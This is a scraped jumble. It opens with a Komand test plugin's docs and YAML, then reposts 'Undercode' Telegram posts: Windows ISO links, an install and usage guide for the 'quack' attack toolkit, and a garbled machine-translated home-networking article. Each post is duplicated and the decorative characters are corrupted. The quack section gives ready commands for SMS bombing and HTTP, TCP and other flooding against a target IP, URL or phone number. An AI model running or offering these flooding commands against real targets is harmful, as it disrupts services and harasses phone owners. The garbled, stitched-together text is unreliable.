This action is used to say goodbye to a name.
#### Input
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|name|string|None|False|Name to say goodbye to|None|
#### Output
|Name|Type|Required|Description|
|----|----|--------|-----------|
|message|string|False|None|
|time|date|False|None|
### Wave
This action is used to wave a user specified number of times.
#### Input
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|count|integer|None|False|None|None|
#### Output
|Name|Type|Required|Description|
|----|----|--------|-----------|
|message|string|False|None|
## Triggers
### Emit Greeting
This trigger is used to triggers a greeting every interval seconds (by default, 15 seconds).
#### Input
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|interval|integer|15|False|How often (in seconds) to trigger a greeting|None|
#### Output
|Name|Type|Required|Description|
|----|----|--------|-----------|
|greeting|string|False|None|
|time|date|False|None|
## Connection
The connection configuration accepts the following parameters:
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|hostname|string|None|False|None|None|
## Troubleshooting
This plugin does not contain any troubleshooting information.
## Workflows
Examples:
* Testing
## References
* [Komand](https://www.komand.com/)
connection:
hostname:
type: string
triggers:
emit_greeting:
description: "Triggers a greeting every Interval seconds (by default, 15 seconds)"
input:
interval:
type: integer
description: "How often (in seconds) to trigger a greeting"
default: 15
output:
greeting:
type: string
time:
type: date
actions:
wave:
description: "Wave"
input:
count:
type: integer
output:
message:
type: string
say_goodbye:
description: "Say goodbye"
input:
name:
type: string
description: "Name to say goodbye to"
output:
message:
type: string
time:
type: date
π¦ E N J O Y
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ALL VERSION Win 10 Official Microsoft EXPIRE 24 HOURS :
π¦ ALL 64 BIT
https://software-download.microsoft.com/pr/Win10_1909_English_x64.iso?t=4d0124f1-5d65-4258-8a00-45f160e43a4e&e=1586907395&h=af280341c29b101a98166b3164cebfd1
π¦ ALL 32 BIT
https://software-download.microsoft.com/pr/Win10_1909_English_x32.iso?t=4d0124f1-5d65-4258-8a00-45f160e43a4e&e=1586907395&h=432f0e496517d7310bbb7930cf5e851e
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ALL VERSION Win 10 Official Microsoft EXPIRE 24 HOURS :
π¦ ALL 64 BIT
https://software-download.microsoft.com/pr/Win10_1909_English_x64.iso?t=4d0124f1-5d65-4258-8a00-45f160e43a4e&e=1586907395&h=af280341c29b101a98166b3164cebfd1
π¦ ALL 32 BIT
https://software-download.microsoft.com/pr/Win10_1909_English_x32.iso?t=4d0124f1-5d65-4258-8a00-45f160e43a4e&e=1586907395&h=432f0e496517d7310bbb7930cf5e851e
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 SMS attack tool, HTTP attack tool and many other attack tools
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/entynetproject/quack
2) cd quack
3) chmod +x install.sh
4) ./install.sh
π¦ quack -h
usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u] [--version]
optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
--version Show Quack Toolkit version.
5) Example of the SMS attack
quack --tool SMS --target 15554443333 --time 10 --threads 10
> Example of the HTTP attack
quack --tool HTTP --target example.com --time 10 --threads 10
> Example of the TCP attack
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 SMS attack tool, HTTP attack tool and many other attack tools
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/entynetproject/quack
2) cd quack
3) chmod +x install.sh
4) ./install.sh
π¦ quack -h
usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u] [--version]
optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
--version Show Quack Toolkit version.
5) Example of the SMS attack
quack --tool SMS --target 15554443333 --time 10 --threads 10
> Example of the HTTP attack
quack --tool HTTP --target example.com --time 10 --threads 10
> Example of the TCP attack
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-the arrival of home network full by Undercode
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) today, those of us who have spare money (sometimes Need very much (More) people started to try to network interactive housing. In the new housing, 10BaseT or even 100 trillion 100BaseT RJ-45 sockets will be everywhere like telephone sockets.
2) Home network also has some disadvantages. First, we do nβt have a technical department at home Support. In addition, network hardware and software may be expensive. Therefore, the advantages of the network must be removed from the cost of installation and maintenance.
π¦ Choose a network solution
1) Let's examine the possible solutions suitable for home networks. It should be pointed out that the PC industry is mature, and a variety of network options are increasing. They range from simple plug-and-play printer sharing networks to firewall protection and server support. Intranet.
2) Generally speaking, the more powerful the network, the higher the cost and management complexity, and the correct method is to always select the network with the functions you need. Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:
π¦ Linux Unix NT Win95 Mac OS / 2
1) Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *
π¦ x Supported by the system itself
* Need additional support
-not supported
2) After comparison of chart functions, some systems have been disregarded. If you are not using this It βs a pity, but it βs best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.
3) Linux started in 1991 and is different from other Unix on several important issues. Linux is a clone of Unix, drafted by Linus Torvalds and assisted by a loosely integrated development team on the Internet.
4) Linux is (and will always be) Free software, with very few restrictions (see GNU's General Public License), has grown into a full-fledged high-performance Unix, originally based on Inter 386, and is now suitable for more systems than any other operating system. Linux is not The only Unix-like free software, but it currently seems to have the best support. He can get good support from the online development team, there are a lot of documents in the form of HOWTO files, FAQ files and Unix help files, and can be online Freely available. A Linux package with an operating system and other full-featured software can be purchased for a CD for less than $ 30 or downloaded for free from the Internet.
5) For file services, printing services, mail services, gateways and routing, use Linux or even Only one 386 can be efficiently implemented. Linux is extremely robust, and many Linux in the world and its operation will not crash or restart for a year. I do nβt believe any Windows or Macintosh product can Do it.
6) Windows NT, the network-oriented operating system provided by Microsoft, was also born in 1991. To get all the features listed above will easily cost you more than $ 1,000. It has good support, and to replace Unix as online He will consider implementing it on various systems. At present, it has not provided complete network functions like Unix or Linux, but it will be done soon. There is no doubt that the prospect of NT with the support of Microsoft is bright. .
π¦ Network configuration-the arrival of home network full by Undercode
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) today, those of us who have spare money (sometimes Need very much (More) people started to try to network interactive housing. In the new housing, 10BaseT or even 100 trillion 100BaseT RJ-45 sockets will be everywhere like telephone sockets.
2) Home network also has some disadvantages. First, we do nβt have a technical department at home Support. In addition, network hardware and software may be expensive. Therefore, the advantages of the network must be removed from the cost of installation and maintenance.
π¦ Choose a network solution
1) Let's examine the possible solutions suitable for home networks. It should be pointed out that the PC industry is mature, and a variety of network options are increasing. They range from simple plug-and-play printer sharing networks to firewall protection and server support. Intranet.
2) Generally speaking, the more powerful the network, the higher the cost and management complexity, and the correct method is to always select the network with the functions you need. Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:
π¦ Linux Unix NT Win95 Mac OS / 2
1) Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *
π¦ x Supported by the system itself
* Need additional support
-not supported
2) After comparison of chart functions, some systems have been disregarded. If you are not using this It βs a pity, but it βs best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.
3) Linux started in 1991 and is different from other Unix on several important issues. Linux is a clone of Unix, drafted by Linus Torvalds and assisted by a loosely integrated development team on the Internet.
4) Linux is (and will always be) Free software, with very few restrictions (see GNU's General Public License), has grown into a full-fledged high-performance Unix, originally based on Inter 386, and is now suitable for more systems than any other operating system. Linux is not The only Unix-like free software, but it currently seems to have the best support. He can get good support from the online development team, there are a lot of documents in the form of HOWTO files, FAQ files and Unix help files, and can be online Freely available. A Linux package with an operating system and other full-featured software can be purchased for a CD for less than $ 30 or downloaded for free from the Internet.
5) For file services, printing services, mail services, gateways and routing, use Linux or even Only one 386 can be efficiently implemented. Linux is extremely robust, and many Linux in the world and its operation will not crash or restart for a year. I do nβt believe any Windows or Macintosh product can Do it.
6) Windows NT, the network-oriented operating system provided by Microsoft, was also born in 1991. To get all the features listed above will easily cost you more than $ 1,000. It has good support, and to replace Unix as online He will consider implementing it on various systems. At present, it has not provided complete network functions like Unix or Linux, but it will be done soon. There is no doubt that the prospect of NT with the support of Microsoft is bright. .